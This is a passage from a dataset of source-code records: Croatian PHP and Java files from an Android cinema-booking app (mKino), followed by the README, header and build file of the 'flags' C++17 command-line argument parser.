$zapis;\r\n }\r\n }\r\n\t\r\n\tfunction BrisanjeIzBaze($naredba)\r\n\t{\r\n\t\t$upit = new Upit();\r\n\t\t$upit->Izvrsi($naredba);\r\n\t\t\r\n\t\t$zapis = array();\r\n\t\tif ($upit->conn->affected_rows > 0)\r\n\t\t{\r\n\t\t\t$zapis[0] = array(\"povratnaInformacijaId\" => 0, \"povratnaInformacijaTekst\" => utf8_encode(\"Uspješno obrisano\"));\r\n\t\t} else\r\n\t\t{\r\n\t\t\t$zapis[0] = array(\"povratnaInformacijaId\" => -8, \"povratnaInformacijaTekst\" => utf8_encode(\"Ništa nije obrisano\"));\r\n\t\t}\r\n\t\t\r\n\t\treturn $zapis;\r\n\t}\r\n \r\n function UpitUBazu($upit)\r\n {\r\n $rezultat = Upit($upit);\r\n $zapisi = array();\r\n if ($rezultat->num_rows > 0)\r\n {\r\n while ($zapis = $rezultat->fetch_assoc())\r\n {\r\n $zapisi[] = $zapis;\r\n }\r\n \r\n return $zapisi;\r\n } else\r\n {\r\n $zapis = array();\r\n $zapis[0] = array(\"povratnaInformacijaId\" => 1, \"povratnaInformacijaTekst\" => utf8_encode(\"Nema zapisa\"));\r\n return $zapis;\r\n }\r\n }\r\n?>" }, { "alpha_fraction": 0.6906993389129639, "alphanum_fraction": 0.6928622722625732, "avg_line_length": 27.72142791748047, "blob_id": "b55fa5338f438c1e2ada8e50e2994150b6479b19", "content_id": "597678c0fc59ff0fdd93607b43818c9e7ff607e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4173, "license_type": "no_license", "max_line_length": 153, "num_lines": 140, "path": "/client-side/src/hr/air/mkino/server/JsonMojeRezervacije.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.server;\r\n\r\n\r\nimport hr.air.mkino.baza.ProjekcijeAdapter;\r\nimport hr.air.mkino.tipovi.ProjekcijaInfo;\r\nimport hr.air.mkino.tipovi.RezervacijaInfo;\r\nimport java.io.IOException;\r\nimport java.util.ArrayList;\r\nimport java.util.List;\r\nimport java.util.concurrent.ExecutionException;\r\nimport org.apache.http.client.ClientProtocolException;\r\nimport org.apache.http.client.HttpClient;\r\nimport org.apache.http.client.ResponseHandler;\r\nimport org.apache.http.client.methods.HttpGet;\r\nimport org.apache.http.impl.client.BasicResponseHandler;\r\nimport org.apache.http.impl.client.DefaultHttpClient;\r\nimport org.json.JSONArray;\r\nimport org.json.JSONException;\r\nimport org.json.JSONObject;\r\n\r\nimport android.content.Context;\r\nimport android.os.AsyncTask;\r\n/**\r\n * Klasa koja služi za dohvaćanje korisničkih rezervacija sa web servisa.\r\n * @author bstivic\r\n *\r\n */\r\npublic class JsonMojeRezervacije extends AsyncTask<String, Void, String> {\r\n\t\r\n\tpublic List<RezervacijaInfo> dohvati(String korisnickoIme, Context c)\r\n\t{\t\t\t\t\t\r\n\t\tthis.execute(korisnickoIme);\r\n\t\tString jsonRezultat = \"\";\r\n\t\ttry {\r\n\t\t\tjsonRezultat = this.get();\r\n\t\t} catch (InterruptedException e) {\r\n\t\t\t\r\n\t\t\te.printStackTrace();\r\n\t\t} catch (ExecutionException e) {\r\n\t\t\t\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\treturn parsirajJson(jsonRezultat, c);\t\t\t\r\n\t}\r\n\r\n\t/**\r\n\t * Metoda koja služi za parsiranje json odgovora servera\r\n\t * @param jsonRezultat\r\n\t * @param context\r\n\t * @return lista rezervacija\r\n\t */\r\n\tprivate List<RezervacijaInfo> parsirajJson(String jsonRezultat, Context c) {\t\t\r\n\t\tList<RezervacijaInfo> rezervacija = new ArrayList<RezervacijaInfo>();\t\t\r\n\t\tProjekcijaInfo projekcija = null;\r\n\t\tProjekcijeAdapter projekcijaAdapter = new ProjekcijeAdapter(c);\r\n\t\ttry {\r\n\t\t\tint idRezervacije = 0 ;\r\n\t\t\tint idProjekcije = -6;\r\n\t\t\tint pomocniIdProjekcije = -7;\r\n\t\r\n\t\t\tList<Integer> sjedala = null;\r\n\t\t\tString kodRezervacije = null;\r\n\t\t\tJSONArray rezultati = new JSONArray(jsonRezultat);\r\n\t\t\t\t\r\n\t\t\tint n = rezultati.length();\r\n\t\t\tfor(int i=0; i<n; i++) \r\n\t\t\t{\r\n\t\t\t\tJSONObject rezultat = rezultati.getJSONObject(i);\r\n\t\t\t\tidProjekcije = rezultat.getInt(\"idProjekcije\");\r\n\t\t\t\t\r\n\t\t\t\t//uvjet će se izvršiti ukoliko imamo više sjedala za istu projekciju, pa ih unosimo u listu i nije potrebno upisivat već poznate podatke o pr0jekciji\r\n\t\t\t\tif(idProjekcije == pomocniIdProjekcije)\r\n\t\t\t\t{\r\n\t\t\t\t\tsjedala.add(rezultat.getInt(\"brojSjedala\"));\t\r\n\t\t\t\t\tif(i == n-1)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprojekcija = projekcijaAdapter.dohvatiProjekciju(idProjekcije, c);\r\n\t\t\t\t\t\trezervacija.add(new RezervacijaInfo(idRezervacije, idProjekcije, \"\", kodRezervacije, sjedala, projekcija));\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\t//inače se radi o drugoj projekciji pa je potrebno unijeti nove podatke\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tif(i != 0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprojekcija = projekcijaAdapter.dohvatiProjekciju(pomocniIdProjekcije, c);\r\n\t\t\t\t\t\trezervacija.add(new RezervacijaInfo(idRezervacije, pomocniIdProjekcije, \"\", kodRezervacije, sjedala, projekcija));\r\n\t\t\t\t\t}\r\n\t\t\t\t\t\r\n\t\t\t\t\tsjedala = new ArrayList<Integer>();\r\n\t\t\t\t\tidRezervacije = rezultat.getInt(\"idRezervacije\");\t\t\t\t\t\t\r\n\t\t\t\t\tkodRezervacije = rezultat.getString(\"kod\");\r\n\t\t\t\t\tsjedala.add(rezultat.getInt(\"brojSjedala\"));\t\r\n\t\t\t\t\tpomocniIdProjekcije = idProjekcije;\r\n\t\t\t\t}\r\n\t\t\t\t\r\n\t\t\t}\r\n\t\t\t\t\r\n\t\t}\t\t\t\r\n\t\tcatch (JSONException e) {\t\r\n\r\n\t\t\te.printStackTrace();\t\t\t\t\r\n\t\t}\r\n\t\t\r\n\t\treturn rezervacija;\r\n\t}\r\n\r\n\t/**\r\n\t * Pomoćna metoda koja u pozadini obrađuje http zahtjev (dohvaćanje podataka)\r\n\t */\r\n\t@Override\r\n\tprotected String doInBackground(String... parametri) {\r\n\t\tString korisnik = parametri[0];\r\n\r\n\t\tHttpClient httpKlijent = new DefaultHttpClient();\r\n\t\tHttpGet httpZahtjev = new HttpGet(\"http://mkinoairprojekt.me.pn/skripte/index.php?tip=mr&korisnik=\"+korisnik);\r\n\t\t\r\n\t\tString jsonResult = \"\";\r\n\t\tResponseHandler<String> handler = new BasicResponseHandler();\r\n\t\t\r\n\t\ttry {\r\n\t\t\tjsonResult = httpKlijent.execute(httpZahtjev, handler);\r\n\t\t}\r\n\t\tcatch(ClientProtocolException e){\r\n\t\t\tString pogreska = e.toString();\r\n\t\t\te.printStackTrace();\r\n\t\t\r\n\t\t\tpogreska.charAt(0);\r\n\t\t}\r\n\t\tcatch(IOException e){\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\thttpKlijent.getConnectionManager().shutdown();\r\n\t\r\n\t\treturn jsonResult;\r\n\t}\r\n\r\n}\r\n" }, { "alpha_fraction": 0.6810725331306458, "alphanum_fraction": 0.6817034482955933, "avg_line_length": 25.807018280029297, "blob_id": "20d06396c310df1bb88ece650ff6ad5fd607d3b0", "content_id": "cad3a8f27087e23184e039026d858581218157cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3180, "license_type": "no_license", "max_line_length": 140, "num_lines": 114, "path": "/client-side/src/hr/air/mkino/server/JsonDohvatiSjedala.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.server;\r\n\r\nimport java.io.IOException;\r\n\r\nimport java.util.ArrayList;\r\nimport java.util.List;\r\nimport java.util.concurrent.ExecutionException;\r\n\r\n\r\nimport org.apache.http.client.ClientProtocolException;\r\nimport org.apache.http.client.HttpClient;\r\nimport org.apache.http.client.ResponseHandler;\r\n\r\nimport org.apache.http.client.methods.HttpGet;\r\n\r\nimport org.apache.http.impl.client.BasicResponseHandler;\r\nimport org.apache.http.impl.client.DefaultHttpClient;\r\n\r\nimport org.json.JSONArray;\r\nimport org.json.JSONException;\r\nimport org.json.JSONObject;\r\n\r\n\r\nimport android.os.AsyncTask;\r\n/**\r\n * klasa koja služi za prijavu korisnika u sustav uz pomoć asinkrone komunikacije \r\n * između aplikacije i servisa koji provjerava da li postoji korisnik u bazi \r\n * podataka sa navedenim korisničkim imenom i lozinkom\r\n * @author bstivic\r\n * */\r\npublic class JsonDohvatiSjedala extends AsyncTask<Integer, List<Integer>, String> {\r\n\r\n\r\n\t\tpublic List<Integer> dohvatiSjedala(int idProjekcije)\r\n\t\t{\t\t\t\r\n\t\t\tthis.execute(idProjekcije);\r\n\t\t\tString jsonRezultat = \"\";\r\n\t\t\ttry {\r\n\t\t\t\tjsonRezultat = this.get();\r\n\t\t\t} catch (InterruptedException e) {\r\n\t\t\t\t\r\n\t\t\t\te.printStackTrace();\r\n\t\t\t} catch (ExecutionException e) {\r\n\t\t\t\t\r\n\t\t\t\te.printStackTrace();\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\treturn parsirajJson(jsonRezultat);\t\t\t\r\n\t\t}\r\n\r\n\t\t/**\r\n\t\t * Parsira json string dohvaćen s web servisa\r\n\t\t * @param jsonRezultat\r\n\t\t * @return popunjeni objekt tipa Korisnik(korisnickoIme, \"\", ime, prezime, email, telefon) \r\n\t\t * ukoliko je prijava uspjesna ili null ukoliko prijava nije uspjesna\r\n\t\t */\r\n\t\t\r\n\t\tprivate List<Integer> parsirajJson(String jsonRezultat) {\t\t\r\n\r\n\t\t\tList<Integer> listaZauzetih = new ArrayList<Integer>() ;\r\n\t\t\ttry {\r\n\t\t\t\t\tJSONArray rezultati = new JSONArray(jsonRezultat);\r\n\t\t\t\t\tint n = rezultati.length();\r\n\t\t\t\t\tfor(int i=0; i<n; i++)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tJSONObject rezultat = rezultati.getJSONObject(i);\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tString sjedaloStrng = rezultat.getString(\"brojSjedala\");\r\n\t\t\t\t\t\tlistaZauzetih.add(Integer.parseInt(sjedaloStrng));\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t}\r\n\t\t\t}\t\t\t\r\n\t\t\tcatch (JSONException e) {\t\r\n\t\t\t/*\r\n\t\t\t * izvršava se ukoliko prijava nije uspješna, odnosno ne postoji\r\n\t\t\t * korisnik sa traženim korisničkim imenom i lozinkom\r\n\t\t\t * */\r\n\t\t\t\te.printStackTrace();\t\t\t\t\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\treturn listaZauzetih;\r\n\t\t}\r\n\r\n\t\t/**\r\n\t\t * Metoda za asinkronu komunikaciju između aplikacije i servisa.\r\n\t\t * @param korisnicko ime i lozinka u obliku ArrayList\r\n\t\t * @return odgovor servisa u json obliku\r\n\t\t * */\r\n\t\tprotected String doInBackground(Integer... idProjekcije) {\r\n\t\t\tHttpClient httpKlijent = new DefaultHttpClient();\r\n\t\t \r\n\t\t\tHttpGet httpGetZahtjev = new HttpGet(\"http://mkinoairprojekt.me.pn/skripte/index.php?tip=sjedalaProjekcija&projekcija=\"+idProjekcije[0]);\r\n\t\t\tString jsonResult = \"\";\r\n\t\t\tResponseHandler<String> handler = new BasicResponseHandler();\r\n\t\t\t\r\n\t\t\t\r\n\t\t\ttry {\t\t\t\r\n\t\t\t\t\t \r\n\t\t\t\tjsonResult = httpKlijent.execute(httpGetZahtjev, handler);\r\n\t\t\t}\r\n\t\t\tcatch(ClientProtocolException e){\r\n\t\t\t\te.printStackTrace();\r\n\t\t\t}\r\n\t\t\tcatch(IOException e){\r\n\t\t\t\te.printStackTrace();\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\thttpKlijent.getConnectionManager().shutdown();\r\n\t\t\treturn jsonResult;\r\n\t\t}\r\n\r\n\t\r\n\r\n}\r\n" }, { "alpha_fraction": 0.6753926873207092, "alphanum_fraction": 0.6753926873207092, "avg_line_length": 16.365385055541992, "blob_id": "4ea68768c0376225ae6882162068ed3fbfb28d17", "content_id": "970a30cd2a04d0b49c080f456e1008e0be682dd0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 956, "license_type": "no_license", "max_line_length": 85, "num_lines": 52, "path": "/client-side/src/hr/air/mkino/tipovi/Korisnik.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.tipovi;\r\n\r\n/**\r\n * Klasa predstavlja složeni tip podataka koji opisuje pojedinog korisnika aplikacije\r\n * \r\n * */\r\npublic class Korisnik {\r\n\tprivate String korisnickoIme;\r\n\tprivate String lozinka;\r\n\tprivate String ime;\r\n\tprivate String prezime;\r\n\tprivate String email;\r\n\tprivate String telefon;\r\n\r\n\t\r\n\tpublic Korisnik(String korisnickoIme, String lozinka, String ime,\r\n\t\t\tString prezime, String email, String telefon) {\r\n\t\tthis.korisnickoIme = korisnickoIme;\r\n\t\tthis.lozinka = lozinka;\r\n\t\tthis.ime = ime;\r\n\t\tthis.prezime = prezime;\r\n\t\tthis.email = email;\r\n\t\tthis.telefon = telefon;\r\n\r\n\t}\r\n\t\r\n\tpublic String getKorisnickoIme()\r\n\t{\r\n\t\treturn korisnickoIme;\r\n\t}\r\n\tpublic String getLozinka()\r\n\t{\r\n\t\treturn lozinka;\r\n\t}\r\n\tpublic String getIme()\r\n\t{\r\n\t\treturn ime;\r\n\t}\r\n\tpublic String getPrezime()\r\n\t{\r\n\t\treturn prezime;\r\n\t}\r\n\tpublic String getEmail()\r\n\t{\r\n\t\treturn email;\r\n\t}\r\n\tpublic String getTelefon()\r\n\t{\r\n\t\treturn telefon;\r\n\t}\r\n\t\r\n}\r\n" } ]
24
sailormoon/flags
https://github.com/sailormoon/flags
789c0eb33d940569fda4c7fdd6b413674b90d9f0
45fa9e968eb21328b2e60be384f2b1e2b3af0af4
c1d201e5c7d4090342c9cf16c627d3ac04c8cb86
refs/heads/master
2023-08-17T14:27:14.839138
2023-08-17T09:22:03
2023-08-17T09:22:03
73,530,193
252
25
Unlicense
2016-11-12T03:53:52
2023-08-09T15:37:36
2023-09-10T21:13:39
C++
[ { "alpha_fraction": 0.6736325621604919, "alphanum_fraction": 0.6807854175567627, "avg_line_length": 25.604476928710938, "blob_id": "c198411a370dd739f32a3da560066221366fb79d", "content_id": "0d63a5502029dc7f00bc43cea8ff69c45d65fa73", "detected_licenses": [ "LicenseRef-scancode-public-domain", "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7132, "license_type": "permissive", "max_line_length": 227, "num_lines": 268, "path": "/README.md", "repo_name": "sailormoon/flags", "src_encoding": "UTF-8", "text": "# ⛳ flags\n[![Build Status](https://travis-ci.org/sailormoon/flags.svg?branch=master)](https://travis-ci.org/sailormoon/flags)\n\nSimple, extensible, header-only C++17 argument parser released into the public domain.\n\n\n<!-- vim-markdown-toc GFM -->\n\n* [why](#why)\n* [requirements](#requirements)\n* [api](#api)\n * [get](#get)\n * [get (with default value)](#get-with-default-value)\n * [positional](#positional)\n* [usage](#usage)\n * [example](#example)\n * [another example](#another-example)\n * [extensions](#extensions)\n * [example](#example-1)\n * [command line details](#command-line-details)\n * [key formatting](#key-formatting)\n * [value assignment](#value-assignment)\n * [bools](#bools)\n* [testing](#testing)\n* [contributing](#contributing)\n\n<!-- vim-markdown-toc -->\n\n# why\nOther argument parsers are:\n- bloated\n- non-extensible\n- not modern\n- complicated\n\n# requirements\nGCC 7.0 or Clang 4.0.0 at a minimum. This library makes extensive use of `optional`, `nullopt`, and `string_view`.\n\n# api\n`flags::args` exposes seven methods:\n\n## get\n`std::optional<T> get(const std::string_view& key) const`\n\nAttempts to parse the given key on the command-line. If the string is malformed or the argument was not passed, returns `nullopt`. Otherwise, returns the parsed type as an optional.\n\n## get (with default value)\n`T get(const std::string_view& key, T&& default_value) const`\n\nFunctions the same as `get`, except if the value is malformed or the key was not provided, returns `default_value`. Otherwise, returns the parsed type.\n\n## get_multiple\n`std::vector<std::optional<T>> get_multiple(const std::string_view& option) const`\n\nGet all values passed for an option. If no value is specified (`--foo --bar`) or the value is malformed, `nullopt` will be used. Values will be in the order they were passed.\n\n## get_multiple (with default value)\n`std::vector<T> get_multiple(const std::string_view& option, T&& default_value) const`\n\nFunctions the same as `get_multiple`, except if the value is malformed or no value is provided, `default_value` will be used.\n\n## get (positional)\n`std::optional<T> get(size_t positional_index) const`\n\nGet an argument from the positional arguments at a specified index. If the value is malformed or the index is invalid, `nullopt` is returned.\n\n## get (positional with default value)\n`T get(size_t positional_index, T&& default_value) const`\n\nFunctions the same as positional `get`, except if the value is malformed or the index is invalid, returns `default_value`. Otherwise, returns the parsed type.\n\n## positional\n`const std::vector<std::string_view>& positional() const`\n\nReturns all of the positional arguments from argv in order.\n\n# usage\n### just the headers\nJust include `flags.h` from the `include` directory into your project.\n\n## Using CMake\n\n### CMake Installation\n\nFlags can be built and installed using [CMake], e.g.\n\n```sh\n$ mkdir build\n$ cd build\n$ cmake ..\n$ make\n$ make install\n```\n\nThe above will install Flags into the standard installation path on a UNIX\nsystem, e.g. `/usr/local/include/`. To change the installation path, use:\n\n```sh\n$ cmake .. -DCMAKE_INSTALL_PREFIX=../install\n```\n\nin the above.\n\n### `find_package`\n\nInstallation creates a `flags-config.cmake` which allows CMake\nprojects to find Flags using `find_package`:\n\n```cmake\nfind_package(flags)\n```\n\nThis exports the `flags` target which can be linked against any other\ntarget. Linking against `flags` automatically sets the include\ndirectories and required flags for C++17 or later. For example:\n\n```cmake\nadd_executable(myexe mysources...)\ntarget_link_libraries(myexe PRIVATE flags)\n```\n\n### `add_subdirectory`\n\nThe Flags can also be added as a dependency with `add_subdirectory`:\n\n```cmake\nadd_subdirectory(path/to/flags)\n```\n\nThis also exports the `flags` target which can be linked against any\nother target just as with the installation case.\n\n## example\n```c++\n#include \"flags.h\" // #include <flags.h> for cmake\n#include <iostream>\n\nint main(int argc, char** argv) {\n const flags::args args(argc, argv);\n\n const auto count = args.get<int>(\"count\");\n if (!count) {\n std::cerr << \"No count supplied. :(\\n\";\n return 1;\n }\n std::cout << \"That's \" << *count << \" incredible, colossal credits!\\n\";\n\n if (args.get<bool>(\"laugh\", false)) {\n std::cout << \"Ha ha ha ha!\\n\";\n }\n return 0;\n}\n```\n```bash\n$ ./program\n> No count supplied. :(\n```\n```bash\n$ ./program --count=5 --laugh\n> That's 5 incredible, colossal credits!\n> Ha ha ha ha!\n```\n\n## another example\n```c++\n#include \"flags.h\" // #include <flags.h> for cmake\n#include <iostream>\n#include <string>\n\nint main(int argc, char** argv) {\n const flags::args args(argc, argv);\n const auto& files = args.positional();\n const auto verbose = args.get<bool>(\"verbose\", false);\n if (verbose) {\n std::cout << \"I'm a verbose program! I'll be reading the following files:\\n\";\n for (const auto& file : files) {\n std::cout << \"* \" << file << '\\n';\n }\n }\n // read files(files);\n return 0;\n}\n```\n```bash\n$ ./program /tmp/one /tmp/two /tmp/three --verbose\n> I'm a verbose program! I'll be reading the following files:\n> * /tmp/one\n> * /tmp/two\n> * /tmp/three\n```\n```bash\n$ ./program /tmp/one /tmp/two /tmp/three --noverbose\n>%\n```\n\n## extensions\n`flags` simply uses the `istream` operator to parse values from `argv`. To extend the parser to support your own types, just supply an overloaded `>>`.\n\n### example\n```c++\nstruct Date {\n int day;\n int month;\n int year;\n};\n\n// Custom parsing code.\nstd::istream& operator>>(std::istream& stream, Date& date) {\n return stream >> date.day >> date.month >> date.year;\n}\n\nint main(int argc, char** argv) {\n const flags::args args(argc, argv);\n if (const auto date = args.get<Date>(\"date\")) {\n // Output %Y/%m/%d if a date was provided.\n std::cout << date->year << \":\" << date->month << \":\" << date->day << '\\n';\n return 0;\n }\n // Sad face if no date was provided or if the input was malformed.\n std::cerr << \":(\\n\";\n return 1;\n}\n```\n\n```bash\n$ ./program --date=\"10 11 2016\"\n> 2016:11:10\n```\n\n```bash\n$ ./program\n> :(\n```\n\n## command line details\n`flags`'s primary goal is to be simple to use for both the user and programmer.\n\n### key formatting\nA key can have any number of preceding `-`s, but must have more than 0.\nThe following are valid keys:\n- `-key`\n- `--key`\n- `-------------key`\n\n### value assignment\nA value can be assigned to a key in one of two ways:\n- `$ ./program --key=value`\n- `$ ./program --key value`\n\n#### bools\nbooleans are a special case. The following values make an argument considered `false`-y when parsed as a bool:\n- `f`\n- `false`\n- `n`\n- `no`\n- `0`\n\nIf none of these conditions are met, the bool is considered `true`.\n\n# testing\nflags uses both [bfg9000](https://github.com/jimporter/bfg9000) and [mettle](https://github.com/jimporter/mettle) for unit-testing. After installing both `bfg9000` and `mettle`, run the following commands to kick off the tests:\n\n1. `9k build/`\n2. `cd build`\n3. `ninja test`\n\n# contributing\nContributions of any variety are greatly appreciated. All code is passed through `clang-format` using the Google style.\n" }, { "alpha_fraction": 0.6518265008926392, "alphanum_fraction": 0.6524491310119629, "avg_line_length": 32, "blob_id": "4890b910276acdb5e5fbb693bf79276e3fea397e", "content_id": "3063f495d9a801a0b456a7fbfdd6d8d8e66ff6aa", "detected_licenses": [ "LicenseRef-scancode-public-domain", "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9636, "license_type": "permissive", "max_line_length": 88, "num_lines": 292, "path": "/include/flags.h", "repo_name": "sailormoon/flags", "src_encoding": "UTF-8", "text": "#ifndef FLAGS_H_\n#define FLAGS_H_\n\n#include <algorithm>\n#include <array>\n#include <optional>\n#include <sstream>\n#include <string>\n#include <string_view>\n#include <unordered_map>\n#include <vector>\n\nnamespace flags {\nnamespace detail {\nusing argument_map =\n std::unordered_map<std::string_view, std::vector<std::optional<std::string_view>>>;\n\n// Non-destructively parses the argv tokens.\n// * If the token begins with a -, it will be considered an option.\n// * If the token does not begin with a -, it will be considered a value for the\n// previous option. If there was no previous option, it will be considered a\n// positional argument.\nstruct parser {\n parser(const int argc, char** argv) {\n for (int i = 1; i < argc; ++i) {\n churn(argv[i]);\n }\n // If the last token was an option, it needs to be drained.\n flush();\n }\n parser& operator=(const parser&) = delete;\n\n const argument_map& options() const { return options_; }\n const std::vector<std::string_view>& positional_arguments() const {\n return positional_arguments_;\n }\n\n private:\n // Advance the state machine for the current token.\n void churn(const std::string_view& item) {\n if(item.empty())\n {\n on_value(item);\n return;\n }\n item.at(0) == '-' ? on_option(item) : on_value(item);\n }\n\n // Consumes the current option if there is one.\n void flush() {\n if (current_option_) on_value();\n }\n\n void on_option(const std::string_view& option) {\n // Consume the current_option and reassign it to the new option while\n // removing all leading dashes.\n flush();\n current_option_ = option;\n current_option_->remove_prefix(current_option_->find_first_not_of('-'));\n\n // Handle a packed argument (--arg_name=value).\n if (const auto delimiter = current_option_->find_first_of('=');\n delimiter != std::string_view::npos) {\n auto value = *current_option_;\n value.remove_prefix(delimiter + 1 /* skip '=' */);\n current_option_->remove_suffix(current_option_->size() - delimiter);\n on_value(value);\n }\n }\n\n void on_value(const std::optional<std::string_view>& value = std::nullopt) {\n // If there's not an option preceding the value, it's a positional argument.\n if (!current_option_) {\n if (value) positional_arguments_.emplace_back(*value);\n return;\n }\n // Consume the preceding option and assign its value.\n // operator[] will insert an empty vector if needed\n options_[*current_option_].emplace_back(std::move(value));\n current_option_.reset();\n }\n\n std::optional<std::string_view> current_option_;\n argument_map options_;\n std::vector<std::string_view> positional_arguments_;\n};\n\n// If a key exists, return an optional populated with its value.\ninline std::optional<std::string_view> get_value(\n const argument_map& options, const std::string_view& option) {\n if (const auto it = options.find(option); it != options.end()) {\n // If a key exists, there must be at least one value\n return it->second[0];\n }\n return std::nullopt;\n}\n\n// If a key exists, return a vector with its values\ninline std::vector<std::optional<std::string_view>> get_values(\n const argument_map& options, const std::string_view& option) {\n if (const auto it = options.find(option); it != options.end()) {\n return it->second;\n }\n return {};\n}\n\n// Coerces the string value of the given option into <T>.\n// If the value cannot be properly parsed or the key does not exist, returns\n// nullopt.\ntemplate <class T>\nstd::optional<T> get(const argument_map& options,\n const std::string_view& option) {\n if (const auto view = get_value(options, option)) {\n if (T value; std::istringstream(std::string(*view)) >> value) return value;\n }\n return std::nullopt;\n}\n\n// Since the values are already stored as strings, there's no need to use `>>`.\ntemplate <>\ninline std::optional<std::string_view> get(const argument_map& options,\n const std::string_view& option) {\n return get_value(options, option);\n}\n\ntemplate <>\ninline std::optional<std::string> get(const argument_map& options,\n const std::string_view& option) {\n if (const auto view = get<std::string_view>(options, option)) {\n return std::string(*view);\n }\n return std::nullopt;\n}\n\n// Special case for booleans: if the value is any of the below, the option will\n// be considered falsy. Otherwise, it will be considered truthy just for being\n// present.\nconstexpr std::array<const char*, 5> falsities{{\"0\", \"n\", \"no\", \"f\", \"false\"}};\ntemplate <>\ninline std::optional<bool> get(const argument_map& options,\n const std::string_view& option) {\n if (const auto value = get_value(options, option)) {\n return std::none_of(falsities.begin(), falsities.end(),\n [&value](auto falsity) { return *value == falsity; });\n }\n if (options.find(option) != options.end()) return true;\n return std::nullopt;\n}\n\n// Coerces the string values of the given option into std::vector<T>.\n// If a value cannot be properly parsed it is not added. If there are\n// no suitable values or the key does not exist, returns nullopt.\ntemplate <class T>\nstd::vector<std::optional<T>> get_multiple(const argument_map& options,\n const std::string_view& option) {\n std::vector<std::optional<T>> values;\n const auto views = get_values(options, option);\n for (const auto &view : views) {\n if (!view) {\n values.push_back(std::nullopt);\n continue;\n }\n if (T value; std::istringstream(std::string(*view)) >> value) {\n values.push_back(value);\n } else {\n values.push_back(std::nullopt);\n }\n }\n return values;\n}\n\n// Since the values are already stored as strings, there's no need to use `>>`.\ntemplate <>\ninline std::vector<std::optional<std::string_view>> get_multiple(\n const argument_map& options, const std::string_view& option) {\n return get_values(options, option);\n}\n\ntemplate <>\ninline std::vector<std::optional<std::string>> get_multiple(\n const argument_map& options, const std::string_view& option) {\n const auto views = get_values(options, option);\n std::vector<std::optional<std::string>> values(views.begin(), views.end());\n return values;\n}\n\n// Special case for booleans: if the value is in the falsities array (see get<bool>)\n// the option will be considered falsy. Otherwise, it will be considered truthy just\n// for being present.\ntemplate <>\ninline std::vector<std::optional<bool>> get_multiple(\n const argument_map& options, const std::string_view& option) {\n const auto views = get_values(options, option);\n std::vector<std::optional<bool>> values;\n for (const auto view : views) {\n if (!view) {\n values.push_back(true);\n continue;\n }\n values.push_back(std::none_of(falsities.begin(), falsities.end(),\n [&view](auto falsity) { return view == falsity; }));\n }\n return values;\n}\n\n// Coerces the string value of the given positional index into <T>.\n// If the value cannot be properly parsed or the key does not exist, returns\n// nullopt.\ntemplate <class T>\nstd::optional<T> get(const std::vector<std::string_view>& positional_arguments,\n size_t positional_index) {\n if (positional_index < positional_arguments.size()) {\n if (T value; std::istringstream(\n std::string(positional_arguments[positional_index])) >>\n value)\n return value;\n }\n return std::nullopt;\n}\n\n// Since the values are already stored as strings, there's no need to use `>>`.\ntemplate <>\ninline std::optional<std::string_view> get(\n const std::vector<std::string_view>& positional_arguments,\n size_t positional_index) {\n if (positional_index < positional_arguments.size()) {\n return positional_arguments[positional_index];\n }\n return std::nullopt;\n}\n\ntemplate <>\ninline std::optional<std::string> get(\n const std::vector<std::string_view>& positional_arguments,\n size_t positional_index) {\n if (positional_index < positional_arguments.size()) {\n return std::string(positional_arguments[positional_index]);\n }\n return std::nullopt;\n}\n} // namespace detail\n\nstruct args {\n args(const int argc, char** argv) : parser_(argc, argv) {}\n\n template <class T>\n std::optional<T> get(const std::string_view& option) const {\n return detail::get<T>(parser_.options(), option);\n }\n\n template <class T>\n T get(const std::string_view& option, T&& default_value) const {\n return get<T>(option).value_or(default_value);\n }\n\n template <class T>\n std::vector<std::optional<T>> get_multiple(const std::string_view& option) const {\n return detail::get_multiple<T>(parser_.options(), option);\n }\n\n template <class T>\n std::vector<T> get_multiple(const std::string_view& option, T&& default_value) const {\n const auto items = get_multiple<T>(option);\n std::vector<T> values;\n values.reserve(items.size());\n for(const auto& item : items) {\n values.push_back(item ? *item : default_value);\n }\n return values;\n }\n\n template <class T>\n std::optional<T> get(size_t positional_index) const {\n return detail::get<T>(parser_.positional_arguments(), positional_index);\n }\n\n template <class T>\n T get(size_t positional_index, T&& default_value) const {\n return get<T>(positional_index).value_or(default_value);\n }\n\n const std::vector<std::string_view>& positional() const {\n return parser_.positional_arguments();\n }\n\n private:\n const detail::parser parser_;\n};\n\n} // namespace flags\n\n#endif // FLAGS_H_\n" }, { "alpha_fraction": 0.5958549380302429, "alphanum_fraction": 0.6148532032966614, "avg_line_length": 23.125, "blob_id": "bb4637b84b4338aadc85f41c8d9d4ce4ae7d23c5", "content_id": "d0cd5f4b694b67339eb11bb601f116aa0a1322d2", "detected_licenses": [ "LicenseRef-scancode-public-domain", "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 579, "license_type": "permissive", "max_line_length": 74, "num_lines": 24, "path": "/build.bfg", "repo_name": "sailormoon/flags", "src_encoding": "UTF-8", "text": "# -*- python -*-\n\nimport os\nfrom os.path import splitext\n\nbfg9000_required_version('>=0.2.0')\nproject('flags', version='1.0pre')\n\nglobal_options(['-std=c++1z', '-Wall', '-Wextra', '-Werror', '-pedantic'],\n 